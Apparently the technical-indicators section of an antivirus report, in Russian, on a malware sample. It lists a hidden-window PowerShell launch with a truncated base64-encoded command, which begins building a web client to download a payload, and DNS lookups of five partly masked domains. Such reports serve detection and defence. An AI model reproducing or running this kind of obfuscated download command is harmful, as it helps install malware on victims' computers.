Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAF8AMwBfADEANgA3AD0AKAAnAGkANQBfACcAKwAnADAAMAAzACcAKQA7ACQAQwA5ADcAXwA4ADQAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdwBfADgAXwA1AF8APQAoACcAaAAnACsAJwB0AH...
- DNS ASK sa###sramon.com
- DNS ASK di###ietnam.com
- DNS ASK bu####nsortium.com
- DNS ASK ef##ur.com
- DNS ASK ev####viajes.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAF8AMwBfADEANgA3AD0AKAAnAGkANQBfACcAKwAnADAAMAAzACcAKQA7ACQAQwA5ADcAXwA4ADQAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdwBfADgAXwA1AF8APQAoACcAaAAnACsAJwB0AH...' (со скрытым окном)